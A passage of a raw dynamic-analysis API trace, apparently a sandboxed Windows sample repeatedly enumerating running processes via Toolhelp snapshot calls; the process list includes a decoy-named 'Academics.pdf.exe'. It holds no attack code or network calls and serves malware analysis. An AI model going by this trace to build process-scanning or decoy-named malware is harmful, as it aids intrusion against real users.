lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0280.712] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0280.713] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0280.714] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0280.714] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0280.715] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0280.716] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0280.716] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0280.717] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0280.718] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0280.718] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0280.719] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0280.720] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0280.721] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0280.721] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0280.723] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0280.723] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0280.724] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.725] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0280.726] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.727] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0280.728] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0280.729] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0280.730] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0280.730] CloseHandle (hObject=0x294) returned 1 [0280.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0280.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0280.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0280.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0280.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0280.731] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0280.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0280.731] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0280.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0280.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0280.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0280.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0280.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0280.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0280.731] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0280.733] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.734] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0280.735] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0280.736] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0280.737] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0280.738] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0280.738] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0280.739] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0280.740] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0280.741] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0280.742] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.743] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.744] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.745] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.746] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.747] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0280.748] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.748] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.749] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0280.750] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0280.751] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0280.752] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0280.753] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.758] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0280.759] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0280.760] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0280.761] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0280.762] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0280.763] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0280.764] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0280.765] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0280.766] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0280.766] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0280.767] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0280.768] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0280.769] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0280.770] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0280.771] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0280.772] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0280.772] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0280.773] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0280.774] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0280.775] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0280.776] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.777] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0280.778] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.778] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0280.779] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0280.780] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0280.781] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0280.782] CloseHandle (hObject=0x294) returned 1 [0280.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0280.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0280.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0280.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0280.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0280.782] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0280.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0280.782] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0280.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0280.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0280.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0280.783] RtlAllocateHeap 